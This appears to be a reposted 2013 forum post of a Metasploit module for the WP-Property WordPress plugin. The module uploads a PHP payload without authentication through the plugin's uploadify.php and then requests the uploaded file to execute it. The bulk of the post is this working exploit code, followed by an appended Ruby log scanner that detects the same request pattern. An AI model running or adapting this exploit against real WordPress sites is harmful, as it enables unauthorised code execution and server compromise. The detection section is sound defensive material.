WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it; I'm talking about msf.
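For defenders, the request pattern in the module above (a POST to the plugin's uploadify.php, then a request for a new .php file in the same directory) can be searched for in web access logs. The following is an added example, not part of the original post or of the Metasploit module; the function name, the combined log format, the allow-list of expected PHP files and the sample lines are assumptions.

```ruby
# Added example: flag activity around WP-Property's bundled uploadify.php.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: the only PHP files expected in that directory on a clean install.
EXPECTED_PHP = %w[uploadify.php check.php].freeze
# Assumption: Apache/nginx "combined" access log format.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

def scan_access_log(lines)
  posters = {}   # client IP => true once it has POSTed to uploadify.php
  findings = []
  lines.each do |line|
    m = LOG_RE.match(line)
    next unless m
    path = m[:path].split('?', 2).first
    idx = path.index(UPLOADIFY_DIR)
    next unless idx
    file = path[(idx + UPLOADIFY_DIR.length)..].downcase
    base = { ip: m[:ip], ts: m[:ts], status: m[:status].to_i, file: file }
    if m[:method] == 'POST' && file == 'uploadify.php'
      # The endpoint accepts uploads without authentication, so every POST is worth review.
      posters[m[:ip]] = true
      findings << base.merge(type: :upload_post)
    elsif file.match?(/\.ph(p\d?|tml)\z/) && !EXPECTED_PHP.include?(file)
      # A script served from the upload directory that the plugin does not ship.
      findings << base.merge(type: :script_in_upload_dir,
                             same_client_uploaded: posters.key?(m[:ip]))
    end
  end
  findings
end

# Constructed sample lines, not taken from a real server.
PREFIX = '/wordpress/wp-content/plugins/wp-property/third-party/uploadify/'
SAMPLE_LOG = [
  %(203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET #{PREFIX}uploadify.php HTTP/1.1" 200 0 "-" "-"),
  %(203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST #{PREFIX}uploadify.php HTTP/1.1" 200 73 "-" "-"),
  %(203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET #{PREFIX}abcde.php HTTP/1.1" 200 0 "-" "-"),
  %(198.51.100.20 - - [04/Jan/2013:19:41:10 +0800] "GET #{PREFIX}uploadify.css HTTP/1.1" 200 512 "-" "-"),
  %(198.51.100.20 - - [04/Jan/2013:19:41:11 +0800] "GET /wordpress/index.php HTTP/1.1" 200 9000 "-" "-")
].freeze

scan_access_log(SAMPLE_LOG).each { |f| puts f } if __FILE__ == $PROGRAM_NAME
```

The module sends the destination in the `folder` form field, so a file can land outside this directory; the scan covers only the path the module uses by default.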